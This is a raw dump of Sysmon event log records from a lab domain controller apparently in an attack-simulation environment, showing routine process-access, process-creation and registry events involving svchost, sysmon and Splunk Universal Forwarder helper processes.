10341000x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.037{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:07.536{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x92f8c389) 10341000x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 